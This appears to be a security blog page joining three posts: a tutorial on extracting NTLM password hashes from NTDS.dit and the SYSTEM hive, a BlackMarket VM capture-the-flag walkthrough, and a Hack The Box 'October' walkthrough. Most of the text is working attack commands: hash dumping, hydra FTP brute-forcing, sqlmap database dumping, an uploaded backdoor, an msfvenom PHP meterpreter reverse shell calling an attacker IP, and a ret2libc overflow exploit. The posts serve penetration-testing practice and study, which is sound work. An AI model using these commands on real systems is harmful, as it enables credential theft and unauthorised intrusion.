3 Ways to Extracting Password Hashes from NTDS.dit

Hello friends!! Today we are going to discuss some forensic tool which is quite helpful in penetration testing to obtain NTLM password hashes from inside the host machine. As we know while penetration testing we get lots of stuff from inside the host machine and if you found some files like NTDS.dit and system hive then read this article to extract user information from those files.

Impacket-secretsdump

Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself. The library provides a set of tools as examples of what can be done within the context of this library.

secretsdump.py: Performs various techniques to dump secrets from the remote machine without executing any agent there. For SAM and LSA Secrets (including cached creds) we try to read as much as we can from the registry and then we save the hives in the target system (%SYSTEMROOT%\Temp directory) and read the rest of the data from there. For DIT files, we dump NTLM hashes, Plaintext credentials (if available) and Kerberos keys using the DL_DRSGetNCChanges() method. It can also dump NTDS.dit via vssadmin executed with the smbexec/wmiexec approach.

Source: https://www.coresecurity.com/corelabs-research/open-source-tools/impacket

As described in its official definition we mainly need two files i.e. ntds.dit & System-hive for extracting NTLM password from inside it. Suppose while making penetration testing on host machine you found these file mention above then with help of following command you can extract hash password for admin account or for other accounts from inside it.

impacket-secretsdump -system /root/Desktop/NTDS/SYSTEM -ntds /root/Desktop/NTDS/ntds.dit LOCAL

-system: denotes path for system hive files (SYSTEM)

-ntds: denotes path for dit file (ntds.dit)

Now as you can observe it has dumped the NTLM password from inside ntd.dit file……………

With help of the online decrypting tool, we try to crack the password hash and as shown in the given image we got "123@password" from its result.

DSInternals PowerShell

The DSInternals PowerShell Module provides easy-to-use cmdlets that are built on top of the Framework. The main features include offline ntds.dit file manipulation and querying domain controllers through the Directory Replication Service (DRS) Remote Protocol.

Source: https://github.com/MichaelGrafnetter/DSInternals

This method is only applicable for Windows users and to extract NTLM hashes you can take help of following commands as described below.

Save-Module DSInternals -Path C:\Windows\System32\WindowsPowershell\v1.0\Modules

Install-Module DSInternals

Import-Module DSInternals

Get-Bootkey -SystemHivePath 'C:\Users\sanje\Desktop\NTDS\SYSTEM'

Get-ADDBAccount -All -DBPath 'C:\Users\sanje\Desktop\NTDS\ntds.dit' -Bootkey $key

From its result, you can observe that we have successfully extracted the NTLM hash and now you can decrypt it again as done above.

Ntdsxtract

The first step is to extract the tables from the NTDS.dit file, we will use esedbexport by downloading libesedb-tools. Libesedb is a library to access the Extensible Storage Engine (ESE) Database File (EDB) format mainly known for its use in Microsoft Extension for prev1.edb file. The ESE database format is used in many different applications like Windows Search, Windows Mail, Exchange, Active Directory (NTDS.dit) and etc.

Source: https://github.com/libyal/libesedb/

For Latest Download link: https://github.com/libyal/libesedb/releases

Now type the following command to download libesedb library for installing esedbexport then extract the tar file as given below.

wget https://github.com/libyal/libesedb/releases/download/20170121/libesedb-experimental-20170121.tar.gz

tar xf libesedb-experimental-20170121.tar.gz

Now install the requirements with help of following commands:

cd libesedb-20170121

apt-get install autoconf automake autopoint libtool pkg-config

./configure

make

make install

ldconfig

Now the tool is installed, use it to dump the tables from the ntds.dit file.

esedbexport -m tables /root/Desktop/NTDS/ntds.dit

This will make a new directory, named as “ntds.dit.export” with the extracted tables and here you will get two main tables i.e. datatable and link_table.

Now download ntdsxtract which is a forensic tool that is capable of extracting information related to user objects, group objects, computer objects, and deleted objects from NTDS.dit files.

git clone https://github.com/csababarta/ntdsxtract.git

Execute the following command to install all set-up files.

cd ntdsxtract

python setup.py build && python setup.py install

Extracting User Infomation and Password Hash

Now with help of all three files (Datatable, link_table, and system hive) it will be capable to dump user information and NT/LM password hashes. And you can execute the following command for obtaining NTLM password in the format of John the ripper.

dsusers.py ntds.dit.export/datatable.4 ntds.dit.export/link_table.6 data --syshive /root/Desktop/NTDS/SYSTEM --passwordhashes --pwdformat john --ntoutfile nthash.txt --lmoutfile lmhash.txt

As you can see it has extract user information and password hash as said above.

cat data/nthash.txt

So now you can crack this password hash with help of John the ripper.

Hack The Blackmarket VM (CTF Challenge)

BlackMarket VM presented at Brisbane SecTalks BNE0x1B (28th Session) which is focused on students and other InfoSec Professional. This VM has total 6 flags and one r00t flag. Each Flag leads to another Flag and flag format is flag {blahblah}. Download it from here.

VM Difficulty Level: Beginner/Intermediate

Penetrating Methodology

§  Network Scanning (Nmap, netdiscover)

§  Information gathering:

§  Abusing web browser for the 1^st flag

§  Generate dictionary (Cewl)

§  FTP brute-force (hydra)

§  FTP login for the 2^nd flag

§  SQL injection for the 3^rd flag

§  Blackmarket login for the 4^th flag

§  Squirrel mail login for the 5^th flag

§  Get cypher mail from inside Inbox.Draft

§  Decipher the mail and reach to backdoor.php

§  Upload backdoor shell

§  Netcat session for the 6^th flag

§  Import python one-liner for proper TTY shell

§  Sudo Rights Privilege Escalation

§  Get Root access and capture the flag.

Let’s Breach!!!

Let’s start with getting to know the IP of VM (Here, I have it at 192.168.1.104 but you will have to find your own).

netdiscover

Now let’s move towards enumeration in context to identify running services and open of victim’s machine by using the most popular tool Nmap.

nmap -A 192.168.1.104

As you can observe it has dumped a lot of details related to open ports and services running through them.

Knowing port 80 is open in victim’s network I preferred to explore his IP in a browser. It put-up a Blackmarket login page but we don't have credential yet, therefore, we like to view its source code for getting a clue.

BOOOMMM!! Luckily I found the 1^st flag from its source code which was in base64.

flag1 {Q0lBIC0gT3BlcmF0aW9uIFRyZWFkc3RvbmU=}

Since the 1^st flag was the base64 encode so we try to decode it with help of the following syntax.

Syntax: echo ‘base64 encoded text’ | base64 -d

WoW!! It sounds CIA Operation Treadstone…………………

With help of Google I found this link and after reading the whole article it becomes clear to me what CIA Operation Treadstone is all about and why flag 1 has held it secretly. Might be Black-market login credential could be extracted from here, therefore I decide to generate a dictionary with help of ‘Jason Bourne’ movie’s character. By executing the following command, we generated a wordlist for username and password dictionary and save it as dict.txt.

cewl http://bourne.wikia.com/wiki/Operation_Treadstone -d 2 -w /root/Desktop/dict.txt

As we knew port 21 is open FTP, therefore, we use above dictionary for FTP brute-force attack with help of hydra.

hydra -L dict.txt -P dict.txt 192.168.1.104 ftp

Successfully found FTP-login user: nicky password: CIA

Then with help above credential, we logged into FTP and enumerate IMP.txt from inside /IMPFiles and download it with the help of the following command.

ftp 192.168.1.104

ls -al

cd ftp

ls -al

cd IMPFiles

ls -al

get IMP.txt

With help of cat command, we open the IMP.txt file and found flag2 form inside it.  Here also we read the given message and analysis the given hint "CIA blackmarket Vehicle workshop”.

cat IMP.txt

flag2 {Q29uZ3JhdHMgUHJvY2VlZCBGdXJ0aGVy}

Looking at above hint I focus on “Vehicle workshop” and start examining the web browser for every possible directory having Vehicle/workshop and UNFORTUNATELY I retrieved following web page when tried http://192.168.1.104/vworkshop.

It was a dashboard of Black-Market Auto Workshop.

After examining the whole dashboard we check-out the Spare Parts and observe its web page and URL. So we decide to use SQLMAP against for SQL injection.

Then execute the following command for fetching its database name with help of sqlmap.

sqlmap -u http://192.168.1.104/vworkshop/sparepartsstoremore.php?sparepartid=1 --dbs --batch

Here I found some database names and as per my consideration, it should be blackmarket therefore without wasting time I step ahead for fetching tables from inside it.

sqlmap -u http://192.168.1.104/vworkshop/sparepartsstoremore.php?sparepartid=1 -D BlackMarket --dump-all --batch

Here I  found a table “flag” and capture the 3^rd flag from here.

Flag3 Find Jason Bourne Email access

Then we have fetched table “user” and found usernames with their hash passwords.

With help of the online MD-5 decrypting tool, we decode above-enumerated hashes and found following.

Username: admin |password:  cf18233438b9e88937ea0176f1311885 MD5: BigBossCIA

Username: user |password:  0d8d5cd06832b29560745fe4e1b941cf md5 (md5($pass)) : user

Then again we explore target IP in the browser and enter following credential for login.

admin

BigBossCIA

It put-up a pop with flag 4 along with a message as shown.

flag4{bm90aGluZyBpcyBoZXJl}

Jason Bourne Email access ?????

From Inside customers, I got email Id jbourne@cia.gov of user Jason Bourne.

At this stage I felt to use Dirb for directory brute-force attack, here we notice /squirrelmail/ and for sure we will be going to get something from here.

So we explore following URL http://192.168.1.104/squirrelmail/ and enter given below credential as described in the 4^th flag (Jason Bourne Email access ?????)

Username: jbourne@cia.gov

Password: ?????

It gives the following mailbox as shown and I start further enumeration.

Then while inspecting INBOX.Drafts I found the 5^th flag from inside IMPORTANT MESSAGE mail.

Flag5 {RXZlcnl0aGluZyBpcyBlbmNyeXB0ZWQ=}

And after reading this we find some encoded text which needs to be decode

Then I decoded the above text as shown and after reading it, I concluded that there should be a “passpass.jpg” under a directory /kgbbackdoor inside Blackmarket workshop which will take us to actual backdoor.

So without wasting time I look for above-said path.

http://192.168.1.104/vworkshop/kgbbackdoor/PassPass.jpg

hhheheyy!!! This image must be hiding something inside, let download it.

Then I use string tool and enter the following command to extract metadata from inside it.

strings PassPass.jpg

Here we found something interesting.

Pass = 5215565757312090656 

Since above extract metadata “Pass” which could be the possible password, and we can use this for further approch therefore we try to decode it. As it was in decimal (5215565757312090656) format so first, we decode it into hex (4861696C4B474220) then decode it into ascii and obtained “HailKGB”

As slowly and gradually we are moving towards our goal as it getting more-and-more hectic for me. After penetrating more I reached at following URL where you will found Page Not Found error message…….

http://192.168.1.104/vworkshop/kgbbackdoor/backdoor.php

BANG ON Dear, it is an illusion because at this page you will get a hidden login form as declared in the encrypted mail. Still, if you have any confusion, please read above decoded text message drop for Dimitri one more time, everything will be cleared to you.

B0000MMM!!! Here we have access the backdoor about whom the sender has informed to Dimitri.

Now lets enter attacker IP : 192.168.1.107 and listening port 4444 and then start netcat listen in a new terminal to get victim’s revese connection.

netcat -lvp 4444

With help of netcat we successfully spawn pty shell of victim’s VM machine then open flag.txt with help of cat command and found 6^th the last flag of this VM. Now we need to get root access to finish this challenge.

cat flag.txt

flag6{Um9vdCB0aW1l}

cd /home

ls -al

cd .Mylife

ls -al

cat .secret

while reading the message I notice something prodigious i.e. DimitriHateApple because the file is named as secret, therefore, I took DimitriHateApple as the password for user: Dimitri

Then I try to login with Dimitri and for that, I execute the following command to access proper terminal.

python -c ‘import pty; pty.spawn(“/bin/bash”)’

su dimitri

DimitryHateApple

Great!!! We login successfully now let’s try privilege escalation for root access.

I was shocked when I checked sudo rights for user Dimitri because I notice ALL Privilege are allotted.

sudo -l

(ALL:ALL) ALL

sudo su

Yehhh!! We own root access.

cd /root

ls

cat THEEND.txt

HURRAYYYY!!!! We finished this challenge.

Happy Hacking

Hack The Box : October Walkthrough

Hello friends!! Today we are going to solve another CTF challenge “October” which is available online for those who want to increase their skill in penetration testing and black box testing. October is retired vulnerable lab presented by Hack the Box for making online penetration practices according to your experience level; they have the collection of vulnerable labs as challenges from beginners to Expert level.

Level: Expert

Task: find user.txt and root.txt file on victim’s machine.

Since these labs are online available therefore they have static IP and IP of sense is 10.10.10.16 so let’s begin with nmap port enumeration.

nmap -sV 10.10.10.16

From given below image, you can observe we found port 22 and 80 are open on target system.

As port 80 is running http server we open the target machine’s ip address in our browser, and find that it is running octobercms.

We go to the default admin login page for octobercms at http://10.10.10.16/backend/backend/auth/signin.

We can login to this CMS with default credentials; Username: admin Password: admin

And we got the admin access to October CMS, Now to get reverse shell first rename your php payload to ‘.php5 ‘. We use msfvenom to create a php payload and save it as shell.php5.

msfvenom -p php/meterpreter/reverse_tcp  lhost=10.10.14.25 lport=4444 -f raw > shell.php5

After create the payload we setup our listener using metasploit.

msf > use exploit/multi/handler

msf > exploit(multi/handler) > set payload php/meterpreter/reverse_tcp

msf > exploit(multi/handler) > set lhost 10.10.14.25

msf > exploit(multi/handler) > set lport 4444

msf > exploit(multi/handler) > run

Now click on Media in the top toolbar, now upload your PHP reverse shell, and click on the public link which is on the right side.

As soon as we click on the link we get our revershell. We use sysinfo command to check the system information about the target machine.

Now spawn a tty shell and try to find binaries in the system with suid bit set.

meterpreter  > shell

python -c “import pty;pty.spawn(‘/bin/bash’)”

find / -perm -4000 2>/dev/null

We find a binary called ovrflw that has suid bit set. We download the file into our system using meterpreter.

meterpreter > download /usr/local/bin/ovrflw /root/Desktop

We open the file in gdb and take a look at the assembly code. At line main+64 we find the strcpy function, As strcpy is vulnerable to buffer overflow we try to exploit it.

First we create a 150 bytes long string to find the EIP offset using patter_create script.

./pattern_create.rb  -l 150

We run the file in gdb along with the 150 byte character as the argument and find that the EIP register was overwritten with 0x64413764.

We pass that into /usr/share/metasploit-framework/tools/pattern_offset.rb, we get an offset of 112. So we need to write 112 characters and then write the address of the instructions we want to be executed.

./pattern_offset.rb -q 64413764 -l 150

Now when we try to insert shellcode into the buffer but we were unable to execute it because of DEP. It prevents code from being executed in the stack. Now we are going to do a ret2libc attack to execute a process already present in the process’ executable memory. We go into the target machine and find ASLR in enabled so we have to brute force the address. Now we find the address of system, exit and /bin/sh.

gdb /usr/local/bin/ovrflw –q

(gdb) b main

(gdb) run

(gdb) p system

(gdb) find 0xb75bd310, +9999999, “/bin/sh”

(gdb) x/s 0xb76dfbac

(gdb) p exit

Now we create our exploit we brute force the address using bash because of ASLR. We align the address in this order: system>exit>/bin/sh.  We get the root shell as soon as it matches our memory address.

After getting the root shell, we move to /root directory and find a file called root.txt we open the file and find the first flag.

After finding the first flag we go to /home/ directory, in home directory and find a directory called harry/. We go inside harry directory and find a file called user.txt, we open user.txt and find our final flag.